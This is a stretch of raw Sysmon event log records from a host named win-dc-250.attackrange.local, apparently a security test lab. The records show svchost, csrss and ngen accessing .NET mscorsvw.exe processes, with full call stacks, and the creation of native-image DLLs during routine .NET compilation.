13:24:30.598{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-460E-6000-5203-000000009A01}1292C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007480Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:24:30.583{08A6967A-4286-6000-0500-000000009A01}6362368C:\Windows\system32\csrss.exe{08A6967A-460E-6000-5203-000000009A01}1292C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000007479Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:24:30.583{08A6967A-44E3-6000-3401-000000009A01}7284492C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{08A6967A-460E-6000-5203-000000009A01}1292C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+abce(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+af4a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b1b4(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8f0a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8fe3(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+9082(wow64) 11241100x80000000000000007478Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.localDLL2021-01-14 13:24:30.536{08A6967A-460E-6000-5103-000000009A01}1200C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\4b0-0\Accessibility.dll2021-01-14 13:24:30.536 10341000x80000000000000007477Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:24:30.489{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-460E-6000-5103-000000009A01}1200C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007476Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:24:30.473{08A6967A-4286-6000-0500-000000009A01}6361144C:\Windows\system32\csrss.exe{08A6967A-460E-6000-5103-000000009A01}1200C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000007475Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:24:30.473{08A6967A-44E3-6000-3401-000000009A01}7284996C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{08A6967A-460E-6000-5103-000000009A01}1200C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+77e0d|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ae03(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c43d(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c4ad(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60779(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60744(wow64) 10341000x80000000000000007474Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:24:30.442{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-460E-6000-5003-000000009A01}4220C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007473Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:24:30.426{08A6967A-4286-6000-0500-000000009A01}6361144C:\Windows\system32\csrss.exe{08A6967A-460E-6000-5003-000000009A01}4220C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000007472Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:24:30.426{08A6967A-44E3-6000-3401-000000009A01}7284492C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{08A6967A-460E-6000-5003-000000009A01}4220C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+abce(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+af4a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b1b4(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8f0a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8fe3(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+9082(wow64) 11241100x80000000000000007471Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.localDLL2021-01-14 13:24:30.348{08A6967A-460D-6000-4F03-000000009A01}4132C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\1024-0\System.Management.dll2021-01-14 13:24:30.348 10341000x80000000000000007494Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:24:31.926{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-460F-6000-5603-000000009A01}2816C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007493Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:24:31.911{08A6967A-4286-6000-0500-000000009A01}6362368C:\Windows\system32\csrss.exe{08A6967A-460F-6000-5603-000000009A01}2816C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000007492Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:24:31.911{08A6967A-44E3-6000-3401-000000009A01}7284996C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{08A6967A-460F-6000-5603-000000009A01}2816C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+77e0d|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ae03(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c43d(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c4ad(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60779(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60744(wow64) 10341000x80000000000000007491Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:24:31.864{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-460F-6000-5503-000000009A01}4212C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007490Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:24:31.848{08A6967A-4286-6000-0500-000000009A01}636752C:\Windows\system32\csrss.exe{08A6967A-460F-6000-5503-000000009A01}4212C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000007489Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:24:31.848{08A6967A-44E3-6000-3401-000000009A01}7284492C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{08A6967A-460F-6000-5503-000000009A01}4212C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+abce(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+af4a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b1b4(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8f0a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8fe3(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+9082(wow64) 10341000x80000000000000007488Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:24:31.801{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-460F-6000-5403-000000009A01}2112C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007487Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:24:31.786{08A6967A-4286-6000-0500-000000009A01}6361144C:\Windows\system32\csrss.exe{08A6967A-460F-6000-5403-000000009A01}2112C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000007486Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:24:31.786{08A6967A-44E3-6000-3401-000000009A01}7284492C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{08A6967A-460F-6000-5403-000000009A01}2112C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+abce(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+af4a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b1b4(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8f0a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8fe3(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+9082(wow64) 11241100x80000000000000007485Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.localDLL2021-01-14 13:24:31.676{08A6967A-460E-6000-5303-000000009A01}4276C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\10b4-0\Microsoft.VisualBasic.dll2021-01-14 13:24:31.676 11241100x80000000000000007502Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.localDLL2021-01-14 13:24:32.942{08A6967A-4610-6000-5803-000000009A01}4216C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\1078-0\System.Transactions.dll2021-01-14 13:24:32.942 10341000x80000000000000007501Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:24:32.614{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4610-6000-5803-000000009A01}4216C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007500Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:24:32.598{08A6967A-4286-6000-0500-000000009A01}636752C:\Windows\system32\csrss.exe{08A6967A-4610-6000-5803-000000009A01}4216C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000007499Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:24:32.598{08A6967A-44E3-6000-3401-000000009A01}7284996C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{08A6967A-4610-6000-5803-000000009A01}4216C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+77e0d|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ae03(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c43d(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c4ad(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60779(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60744(wow64) 10341000x80000000000000007498Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:24:32.536{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4610-6000-5703-000000009A01}1636C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007497Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:24:32.520{08A6967A-4286-6000-0500-000000009A01}636752C:\Windows\system32\csrss.exe{08A6967A-4610-6000-5703-000000009A01}1636C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000007496Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 